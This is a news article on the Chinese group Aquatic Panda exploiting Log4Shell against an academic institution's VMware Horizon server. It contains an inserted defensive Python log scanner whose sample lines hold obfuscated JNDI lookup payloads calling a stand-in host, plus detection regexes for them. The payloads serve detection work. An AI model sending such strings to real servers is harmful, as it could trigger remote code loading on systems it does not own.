Chinese Hackers Target Academic Institution Using Log4Shell Exploit

Aquatic Panda, a China-based targeted intrusion adversary, has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting, on targeted systems.

CrowdStrike, a cybersecurity firm, stated that the infiltration, which was foiled, was aimed at an unnamed “large academic institution”. The state-sponsored group is believed to have been in operation since mid-2020, conducting intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology and government sectors.

This attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) with the aim of gaining access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.
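The access vector described above leaves a trace in the web-facing logs of the exposed application: the Log4j lookup string (`${jndi:...}`) arrives in a request header or parameter, often URL-encoded or wrapped in nested lookups to dodge naive pattern matching. The following is an added defensive example, not code from the article or from CrowdStrike, that normalises such obfuscation and flags the lookup in sample access-log lines. The log lines, the host name `c2.example.invalid` and the timestamps are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article). The first
# line is benign; the rest carry the JNDI lookup in progressively obfuscated
# forms: plain, case-lookup nesting, default-value nesting, and URL-encoded.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.example.invalid:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://c2.example.invalid/x}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://c2.example.invalid/y}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:13 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2Fc2.example.invalid%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# ${lower:x} / ${upper:x} resolve to x (case is irrelevant for our matching).
_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} is Log4j's default-value syntax and resolves to x when the
# key is undefined; ${::-x} is the shortest form of that trick.
_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup we actually want to flag, with its URI scheme captured.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and the common lookup obfuscations so that a single
    pattern can recognise the JNDI lookup. Iterates to a fixed point because
    the tricks are usually nested or double-encoded; max_rounds bounds the
    work done on adversarial input."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = _LOOKUP_CASE.sub(r"\1", new)
        new = _LOOKUP_DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return one finding per log line that contains a JNDI lookup after
    normalisation: the line index, the URI scheme used, and the normalised
    text an analyst can read without decoding by hand."""
    findings = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        match = _JNDI.search(norm)
        if match:
            findings.append({"line": idx, "scheme": match.group(1).lower(), "normalized": norm})
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: jndi lookup via {finding['scheme']}")
        print("   ", finding["normalized"])
```

Normalising before matching is the design choice that matters here: a rule that looks only for the literal `${jndi:` misses three of the four malicious lines above. In a real deployment the same normalisation should be applied to every request field Log4j might log (User-Agent, X-Forwarded-For, query parameters, form bodies), and a hit is a reason to check the host's outbound connections for the LDAP, RMI or DNS callback that follows.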


“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding that it involved the use of an exploit that was published on GitHub on December 13, 2021.

The malicious behavior of Aquatic Panda went beyond conducting reconnaissance of the compromised host, starting with an attempt to stop a third-party endpoint detection and response (EDR) service before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

However, after being alerted, the victim organization “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” Because the attack was disrupted, the actor's ultimate intent remains unknown.
